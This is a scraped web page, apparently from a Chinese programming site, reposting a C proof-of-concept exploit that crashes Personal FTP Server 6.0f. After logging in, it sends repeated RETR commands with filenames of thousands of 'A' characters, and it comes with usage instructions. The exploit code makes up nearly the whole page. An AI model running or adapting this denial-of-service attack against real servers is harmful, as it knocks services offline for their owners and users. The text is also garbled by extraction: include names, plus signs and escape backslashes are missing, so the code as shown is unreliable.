欢迎来到福编程网,本站提供各种互联网专业知识!

The Personal FTP Server 6.0f RETR Denial of Service Exploit

发布时间:1970-01-01 作者:佚名 来源:互联网
/****ThePersonalFTPServer6.0fRETRDOSexploit***AvulnerabilityexistsinthewayPersonalFTPServerhandlesmultipleRETRcommandswithoverlylongfilenames.Whenconfrontedwithsuchconsecutiverequeststheserverwillcrash.
/*

*** The Personal FTP Server 6.0f RETR DOS exploit *** A vulnerability exists in the way Personal FTP Server handles

multiple RETR commands with overly long filenames.When confronted

with such consecutive requests the server will crash. Usage : ./pftpdos ip port user password

Ex. : ./pftpdos 127.0.0.1 21 test test Personal FTP Server homepage: http://www.michael-roth-software.de/ Discovey POC by Shinnok raydenxy [at] yahoo com

http://shinnok.evonet.ro */ #include

#include

#include

#include

#include

#include

#include

#include int

min (int x, int y)

{

if (x < y)return x;

else

return y;

}

extern int errno; int

main (int argc, char *argv[])

{

struct sockaddr_in server;

int i, t, s;

char *req, *buff;

s = socket (AF_INET, SOCK_STREAM, 0);

bzero (&server, sizeof (server));

server.sin_family = AF_INET;

server.sin_addr.s_addr = inet_addr (argv[1]);

server.sin_port = htons (atoi (argv[2]));

connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr));

req = malloc (sizeof (char) *

(((strlen (argv[3]) - strlen (argv[4]))

min (strlen (argv[3]), strlen (argv[4])) 8)));

sprintf (req, "USER %sxDxA", argv[3]);

write (s, req, strlen (req));

sprintf (req, "PASS %sxDxA", argv[4]);

write (s, req, strlen (req));

free (req);

for (i = 1; i <= 5; i )

{

t = (sizeof (char) * 1000 * i);

buff = malloc (t 1);

memset (buff, 'A', t);

buff[t 1] = '';

req = malloc (t 9);

sprintf (req, "RETR %sxDxA", buff);

if (write (s, req, strlen (req)) == -1)

{

perror (NULL);

printf ("Target pwned!n", errno);

}

free (req);

free (buff);

sleep (1);

}

close (s);

return (EXIT_SUCCESS);

}

相关推荐